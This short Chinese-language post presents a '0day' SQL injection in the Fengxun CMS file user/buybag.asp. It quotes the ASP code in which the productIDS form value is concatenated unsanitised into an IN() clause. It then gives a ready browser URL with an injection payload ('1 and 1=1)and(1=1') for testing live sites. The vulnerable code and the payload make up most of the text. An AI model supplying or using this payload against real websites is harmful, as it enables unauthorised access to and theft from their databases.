风讯注入0day

有注入漏洞的文件是user目录下的buybag.asp

我们来看代码: 40行开始

以下是引用片段： if request.Form("action")="makeorder" then Dim productIDS,OrderRs,BagRs,OrderDetail,OrderNumber,ExpressCompany productIDS=DelHeadAndEndDot(request.Form("productIDS"))//这个函数功能是去掉头尾的逗号 Set OrderRs=Server.CreateObject(G_FS_RS) Set BagRs=Server.CreateObject(G_FS_RS) Set OrderDetail=Server.CreateObject(G_FS_RS) OrderRs.open "Select * From FS_ME_Order where 1=2",User_Conn,1,3 BagRs.open "Select mid,BuyType,AddTime,UserNumber,BuyMoney,BuyNumber from FS_ME_BuyBag where MID in("&productIDS&")",User_Conn,1,1

in()中注射发生!!

这样我们在浏览器中构造下面语句就可以注入了: http://www.你的网址.com/user/buybag.asp?action=makeorder&productIDS=1 and 1=1)and(1=1